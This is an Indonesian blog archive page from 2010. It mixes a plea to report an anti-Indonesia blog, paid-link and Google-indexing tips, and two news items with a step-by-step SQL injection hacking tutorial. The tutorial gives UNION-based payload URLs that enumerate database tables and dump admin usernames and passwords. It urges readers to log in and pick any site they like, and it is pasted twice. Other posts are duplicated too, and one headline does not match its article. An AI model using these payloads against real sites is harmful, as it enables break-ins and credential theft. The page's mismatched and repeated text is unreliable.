Sebelumnya sudah ada beberapa blog yang menghina bangsa indonesia,namun kali ini saya menemukan lagi blog yang menghina bangsa indonesia.
maka dari itu saya mohon teman-teman jangan terprofokasi untuk membalasannya,mari kita laporkan saja blog tersebut ke link di bawah ini:
http://www.google.com/support/blogger/?hl=en&page=troubleshooter.cs&Submit=Submit&contact_type=main_tos
pilih Need to contact our support team? lalu pilih Report Hate Speech on Blogger
ini adalah link blog yang menghina bangsa indonesia:
http://indonbodoh.blogspot.com
Entah siapa di balik yang membuat blog itu,apakah yang kita kira selama ini? atau ada orang ketiga yang ingin mengadu domba?
mari kita laporkan saja semoga blog itu di tutup dari google.
Sabtu, 18 Desember 2010
Hacking Website dengan tekhnik SQL Injection
hacking web atau biasa disebut web attack sangat banyak caranya, salah satunya dengan cara SQL injection.
apa itu SQL injection ?
SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke 'query'
dengan cara manipulasi data input ke applikasi tsb.
oke, mari kita simak bersama-sama.
1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah http://www.target.com/berita.php?id=100
2. Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
Contoh :
http://www.target.com/berita.php?id=100'
atau
http://www.target.com/berita.php?id=-100
4. Maka akan muncul pesan error...
"You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near '''
at line 1" Dan masih banyak lagi macamnya.
5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya...
Disini kita akan menggunakan perintah order by
Contoh :
http://www.target.com/berita.php?id=100+order+by+1/*
Hohoho...apalagi itu "/*" ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake "--". Terserah aja...
Kalo "+" sebagai penghubung perintah...
6. Nah sampe sini langsung dah nyobain satu2...
http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)
Sampai muncul error...
Misalkan errornya disini...
http://www.target.com/berita.php?id=100+order+by+10/*
Berarti yang kita ambil adalah "9"
http://www.target.com/berita.php?id=100+order+by+9/*
7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION
Contoh :
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*
Trus perhatikan angka berapa yang keluar (Kayak togel aja... ;p)
8. Misalnya angka hoki yang keluar adalah "3" maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah "version()" atau "@@version"
http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*
Atau
http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*
9. Nah kalo versinya 5 langsung aja pake perintah "information_schema" untuk melihat tabel dan kolom yang ada pada database...
Contoh :
http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*
Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gua gak pake keliatan kok tabelnya...Apa gua salah? Mungkin tapi sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak lain...ya maklum lah baru belajar...Hehehe...
Misalnya yang lo liat adalah table "admin"
Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata "table"-nya...
Contoh:
http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*
Misalnya kolom yang keluar adalah "password" dan "username"
Langsung aja kita liat isinya...
Contoh :
http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*
dan
http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*
Bisa diliat dah username ama passwordnya...Tinggal login...Cari yang asik terus...Terserah Anda...
---------------------------------------------------
begitulah yang dituliskan disana.
anda masih belum paham tentang apa SQL injection ?
tenang silahkan anda download file dokumen dibawah ini tentang SQL injection step by step.
apa itu SQL injection ?
SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke 'query'
dengan cara manipulasi data input ke applikasi tsb.
oke, mari kita simak bersama-sama.
1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah http://www.target.com/berita.php?id=100
2. Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
Contoh :
http://www.target.com/berita.php?id=100'
atau
http://www.target.com/berita.php?id=-100
4. Maka akan muncul pesan error...
"You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near '''
at line 1" Dan masih banyak lagi macamnya.
5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya...
Disini kita akan menggunakan perintah order by
Contoh :
http://www.target.com/berita.php?id=100+order+by+1/*
Hohoho...apalagi itu "/*" ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake "--". Terserah aja...
Kalo "+" sebagai penghubung perintah...
6. Nah sampe sini langsung dah nyobain satu2...
http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)
Sampai muncul error...
Misalkan errornya disini...
http://www.target.com/berita.php?id=100+order+by+10/*
Berarti yang kita ambil adalah "9"
http://www.target.com/berita.php?id=100+order+by+9/*
7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION
Contoh :
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*
Trus perhatikan angka berapa yang keluar (Kayak togel aja... ;p)
8. Misalnya angka hoki yang keluar adalah "3" maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah "version()" atau "@@version"
http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*
Atau
http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*
9. Nah kalo versinya 5 langsung aja pake perintah "information_schema" untuk melihat tabel dan kolom yang ada pada database...
Contoh :
http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*
Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gua gak pake keliatan kok tabelnya...Apa gua salah? Mungkin tapi sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak lain...ya maklum lah baru belajar...Hehehe...
Misalnya yang lo liat adalah table "admin"
Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata "table"-nya...
Contoh:
http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*
Misalnya kolom yang keluar adalah "password" dan "username"
Langsung aja kita liat isinya...
Contoh :
http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*
dan
http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*
Bisa diliat dah username ama passwordnya...Tinggal login...Cari yang asik terus...Terserah Anda...
begitulah yang dituliskan disana.
anda masih belum paham tentang apa SQL injection ?
tenang silahkan anda download file dokumen dibawah ini tentang SQL injection step by step.
Jumat, 03 Desember 2010
Blog menghasilkan dollar
Bagaimana dengan bayarannya? di Link Show Off Anda dapat menentukan sendiri berapa harga link-nya. LinkShowOff hanya menentukan harga paling rendah yakni sebesar $1/bulan. Artinya Anda tidak boleh memberikan harga di bawah $1/link/bulan.
Anda bebas menentukan banyaknya link dalam satu widget. Paling sedikit 5 link, dan paling banyak 20 link. Link advertiser akan terpasang selamanya di widget tersebut sampai ada link baru lagi yang masuk. Jadi, link paling baru akan secara otomatis berada di urutan paling atas di widget. Tapi meskipun terpasang selamanya, Anda tidak perlu khawatir akan kena penalti dari Google, karenasemua iklan link di LinkShowOff ber-tag nofollow.
LinkShowOff juga menyediakan program referal.Bila Anda mempromosikan LinkShowOff pada member baru, maka Anda akan memperoleh bayaran sebesar $3 setiap referal Anda memperoleh $3 juga. Untuk bergabung di LinkShowOff anda bisa klik di gambar LinkShowOff ini..
Klik Disini untuk mendaftar
Rabu, 01 Desember 2010
Agar Blog Anda Tampil di Google
proses bersama dengan mengikuti langkah berikut:
1. Buat account Google (jika anda belum memilikinya). Ada banyak manfaat seperti ini saya akan menjelaskan dalam waktu dekat.
2. Login ke Webmaster tools selection dengan account Google Anda.
3. Pada “Tambahkan situs baru” bagian, masukkan URL lengkap blog Anda (misalnya: http://www.yourblog.com). Google akan biasanya indeks blog Anda pada penjaringan berikutnya.
4. Anda mungkin juga ingin memastikan bahwa Anda adalah pemilik blog Anda; ini memungkinkan Anda untuk mengakses statistik dan merambah kesalahan. Ada dua cara untuk memverifikasi kepemilikan: menambahkan meta tag pada template blog, atau meng-upload file HTML ke direktori yang ditentukan oleh Google. Untuk pemilik blog ini mungkin lebih mudah untuk menambahkan meta tag yang dapat Anda lakukan dengan mudah oleh mengcopy paste sebagian kecil kode ke bagian template blog Anda (Google menyediakan tag ini unik ketika Anda memilih formulir ini untuk verifikasi). Jangan khawatir, tag tidak dapat dilihat oleh pembaca Anda!
5. Setelah Anda memverifikasi kepemilikan, itu juga ide yang baik untuk memberitahu ke Google lokasi Anda sitemap (Saya menjelaskan cara membuat sitemap untuk blog Anda di posting ini). Hal ini akan memastikan bahwa semua halaman blog Anda benar diindeks dan tersedia untuk pencarian. Untuk melakukannya, klik “Sitemaps” tab di bagian atas Anda Webmaster Tools dashboard, dan klik tombol “add” di sebelah link url blog Anda. Anda harus memasukkan penuh url sitemap Anda (misalnya: http://yourblog.com/sitemap.xml).
Setelah diambil langkah-langkah ini, Google akan menjelajah blog Anda secara rutin untuk memeriksa pembaruan dan halaman baru. Anda dapat memastikan bahwa semua halaman telah diindeks oleh masuk ke Webmaster tools> Sitemaps untuk melihat seberapa banyak URL yang sedang diindeks. Jika anda melihat bahwa beberapa halaman posting biasanya tidak diindeks, Anda dapat membantu Google untuk menghubungkan mereka dengan indeks dari posting (membuat “posting terkait” bagian lainnya dalam posting, misalnya).
Pada akhirnya, semua posting blog Anda dan halaman akan dijelajahi dan diindeks oleh Google, dan blog Anda akan mencapai “Page Rank” yang dapat Anda lihat di Webmaster tools. Anda juga dapat melihat detail statistik untuk blog Anda, link ke posting Anda, dan semua kesalahan crawl (seperti missing file) yang dapat ditemukan.
Tentu saja, cara terbaik untuk meningkatkan visibilitas blog Anda di mesin pencari akan bekerja keras di blog Anda, tulis besar posting dan menghasilkan beberapa link love! J subyek akan berbicara tentang masa depan secara rinci dalam posting …
1. Buat account Google (jika anda belum memilikinya). Ada banyak manfaat seperti ini saya akan menjelaskan dalam waktu dekat.
2. Login ke Webmaster tools selection dengan account Google Anda.
3. Pada “Tambahkan situs baru” bagian, masukkan URL lengkap blog Anda (misalnya: http://www.yourblog.com). Google akan biasanya indeks blog Anda pada penjaringan berikutnya.
4. Anda mungkin juga ingin memastikan bahwa Anda adalah pemilik blog Anda; ini memungkinkan Anda untuk mengakses statistik dan merambah kesalahan. Ada dua cara untuk memverifikasi kepemilikan: menambahkan meta tag pada template blog, atau meng-upload file HTML ke direktori yang ditentukan oleh Google. Untuk pemilik blog ini mungkin lebih mudah untuk menambahkan meta tag yang dapat Anda lakukan dengan mudah oleh mengcopy paste sebagian kecil kode ke bagian template blog Anda (Google menyediakan tag ini unik ketika Anda memilih formulir ini untuk verifikasi). Jangan khawatir, tag tidak dapat dilihat oleh pembaca Anda!
5. Setelah Anda memverifikasi kepemilikan, itu juga ide yang baik untuk memberitahu ke Google lokasi Anda sitemap (Saya menjelaskan cara membuat sitemap untuk blog Anda di posting ini). Hal ini akan memastikan bahwa semua halaman blog Anda benar diindeks dan tersedia untuk pencarian. Untuk melakukannya, klik “Sitemaps” tab di bagian atas Anda Webmaster Tools dashboard, dan klik tombol “add” di sebelah link url blog Anda. Anda harus memasukkan penuh url sitemap Anda (misalnya: http://yourblog.com/sitemap.xml).
Setelah diambil langkah-langkah ini, Google akan menjelajah blog Anda secara rutin untuk memeriksa pembaruan dan halaman baru. Anda dapat memastikan bahwa semua halaman telah diindeks oleh masuk ke Webmaster tools> Sitemaps untuk melihat seberapa banyak URL yang sedang diindeks. Jika anda melihat bahwa beberapa halaman posting biasanya tidak diindeks, Anda dapat membantu Google untuk menghubungkan mereka dengan indeks dari posting (membuat “posting terkait” bagian lainnya dalam posting, misalnya).
Pada akhirnya, semua posting blog Anda dan halaman akan dijelajahi dan diindeks oleh Google, dan blog Anda akan mencapai “Page Rank” yang dapat Anda lihat di Webmaster tools. Anda juga dapat melihat detail statistik untuk blog Anda, link ke posting Anda, dan semua kesalahan crawl (seperti missing file) yang dapat ditemukan.
Tentu saja, cara terbaik untuk meningkatkan visibilitas blog Anda di mesin pencari akan bekerja keras di blog Anda, tulis besar posting dan menghasilkan beberapa link love! J subyek akan berbicara tentang masa depan secara rinci dalam posting …
Israel Tangkap Lagi Palestina
Yahudi Ortodoks rupanya menjadi senjata bagi warga Israel, khususnya perempuan untuk menolak wajib militer. Itulah yang membuat pihak militer Israel geram. Pasalnya, gara-gara alasan itu, wajib militer menjadi bahan olok-olok.
Bak tak kehabisan akal, militer Israel pun melacak lebih dari 1.000 akun perempuan Israel di Facebook. Nyatanya, meski mengaku Yahudi Ortodoks, tingkah polah mereka jauh dari apa yang menjadi keyakinan salah satu sekte agama Yahudi tersebut. Begitulah catatan warta AP dan AFP pada Rabu (24/11/2010).
Pemeluk Yahudi Ortodoks sampai kini meyakini kebiasaan-kebiasaan yang dahulu ditetapkan oleh Musa, salah satu nabi besar Israel. Laki-laki Yahudi Ortodoks punya kewajiban untuk memelihara kumis dan cambangnya.
Lalu, pekerjaan militer, maksudnya tentara, adalah pekerjaan laki-laki. Perempuan sama sekali tak terlibat dalam urusan macam itu.
Kemudian, soal makanan, penganut Yahudi Ortodoks mempertahankan kosher alias bersih dari kenajisan. Menurut catatan dari Kitab Suci Perjanjian Lama pada Kitab Imamat, misalnya, ada beberapa hewan yang dianggap najis sehingga tidak boleh dimakan, semisal babi hutan, kelinci, ataupun unta.
Bukti bicara
Kendati begitu, nyatanya militer Israel justru menemukan banyak pertentangan perilaku dari Facebook tadi. Seorang perwira militer senior, misalnya, menemukan bukti tentang seorang perempuan muda yang menyatakan diri bisa dikecualikan dari wajib militer karena beragama Yahudi Ortodoks.
Namun, perempuan tersebut menampilkan foto-foto yang tidak sopan atau makan di restoran yang bukan kosher.
Yang lainnya tertangkap ketika membalas undangan pesta pada Jumat malam. Padahal, hari itu adalah hari Sabat Yahudi. Yahudi Ortodoks amat ketat menerapkan peraturan tidak boleh berkegiatan seperti pesta saat Sabat.
Diperkirakan sekitar 35 persen dari perempuan Yahudi di Israel tidak ikut wajib militer karena alasan agama, tetapi militer menduga ribuan dari mereka sebenarnya hidup secara sekuler dan layak untuk ikut wamil.
Para perempuan yang menghindar dari wajib militer itu karena berbohong sebenarnya diancam dengan tuntutan kriminal. Namun, hal itu belum pernah terjadi.
Wajib militer diterapkan kepada semua warga Israel yang berusia 18 tahun ke atas, dengan masa dinas tiga tahun untuk pria dan dua tahun bagi perempuan. Kini, di Israel, terdapat kurang lebih 800.000 penganut Yahudi Ortodoks.
Bak tak kehabisan akal, militer Israel pun melacak lebih dari 1.000 akun perempuan Israel di Facebook. Nyatanya, meski mengaku Yahudi Ortodoks, tingkah polah mereka jauh dari apa yang menjadi keyakinan salah satu sekte agama Yahudi tersebut. Begitulah catatan warta AP dan AFP pada Rabu (24/11/2010).
Pemeluk Yahudi Ortodoks sampai kini meyakini kebiasaan-kebiasaan yang dahulu ditetapkan oleh Musa, salah satu nabi besar Israel. Laki-laki Yahudi Ortodoks punya kewajiban untuk memelihara kumis dan cambangnya.
Lalu, pekerjaan militer, maksudnya tentara, adalah pekerjaan laki-laki. Perempuan sama sekali tak terlibat dalam urusan macam itu.
Kemudian, soal makanan, penganut Yahudi Ortodoks mempertahankan kosher alias bersih dari kenajisan. Menurut catatan dari Kitab Suci Perjanjian Lama pada Kitab Imamat, misalnya, ada beberapa hewan yang dianggap najis sehingga tidak boleh dimakan, semisal babi hutan, kelinci, ataupun unta.
Bukti bicara
Kendati begitu, nyatanya militer Israel justru menemukan banyak pertentangan perilaku dari Facebook tadi. Seorang perwira militer senior, misalnya, menemukan bukti tentang seorang perempuan muda yang menyatakan diri bisa dikecualikan dari wajib militer karena beragama Yahudi Ortodoks.
Namun, perempuan tersebut menampilkan foto-foto yang tidak sopan atau makan di restoran yang bukan kosher.
Yang lainnya tertangkap ketika membalas undangan pesta pada Jumat malam. Padahal, hari itu adalah hari Sabat Yahudi. Yahudi Ortodoks amat ketat menerapkan peraturan tidak boleh berkegiatan seperti pesta saat Sabat.
Diperkirakan sekitar 35 persen dari perempuan Yahudi di Israel tidak ikut wajib militer karena alasan agama, tetapi militer menduga ribuan dari mereka sebenarnya hidup secara sekuler dan layak untuk ikut wamil.
Para perempuan yang menghindar dari wajib militer itu karena berbohong sebenarnya diancam dengan tuntutan kriminal. Namun, hal itu belum pernah terjadi.
Wajib militer diterapkan kepada semua warga Israel yang berusia 18 tahun ke atas, dengan masa dinas tiga tahun untuk pria dan dua tahun bagi perempuan. Kini, di Israel, terdapat kurang lebih 800.000 penganut Yahudi Ortodoks.
Presiden Rusia Kritik Galaxy Tab
Di sela kesibukan, Presiden Rusia Dimitry Medvedev tampak berusaha mengikuti perkembangan teknologi. Hal ini terlihat kala dia meminang tablet Samsung Galaxy Tab dan coba mengutak-atiknya.
Medvedev membeli langsung Galaxy Tab di negeri asalnya, Korea Selatan. Ketika mencoba fitur kamera di gadget Android ini, sang presiden merasa kecewa. Ia pun mengutarakan kritik di akun Twitter resminya, @MedvedevRussiaE, lengkap dengan hasil foto Galaxy Tab yang merekam suasana kota Moskow.
"Musim dingin tiba di Moskow. Foto ini diambil dengan Samsung Galaxy Tab. Ini menyenangkan, namun kualitasnya tidak bagus," demikian tulisnya mengenai kamera Galaxy Tab.
Memang jika dilihat dari foto yang diposting sang presiden, hasilnya tidak terlalu mengesankan. Barangkali pula ekspektasi Medvedev kadung terlalu tinggi terhadap kamera Galaxy Tab.
Sayang selain kamera, Medvedev tidak menulis soal lain mengenai kesannya pada Galaxy Tab. Barangkali ia kembali sibuk mengurus agenda kenegaraan negeri Beruang Merah
Medvedev membeli langsung Galaxy Tab di negeri asalnya, Korea Selatan. Ketika mencoba fitur kamera di gadget Android ini, sang presiden merasa kecewa. Ia pun mengutarakan kritik di akun Twitter resminya, @MedvedevRussiaE, lengkap dengan hasil foto Galaxy Tab yang merekam suasana kota Moskow.
"Musim dingin tiba di Moskow. Foto ini diambil dengan Samsung Galaxy Tab. Ini menyenangkan, namun kualitasnya tidak bagus," demikian tulisnya mengenai kamera Galaxy Tab.
Memang jika dilihat dari foto yang diposting sang presiden, hasilnya tidak terlalu mengesankan. Barangkali pula ekspektasi Medvedev kadung terlalu tinggi terhadap kamera Galaxy Tab.
Sayang selain kamera, Medvedev tidak menulis soal lain mengenai kesannya pada Galaxy Tab. Barangkali ia kembali sibuk mengurus agenda kenegaraan negeri Beruang Merah
Langganan:
Postingan (Atom)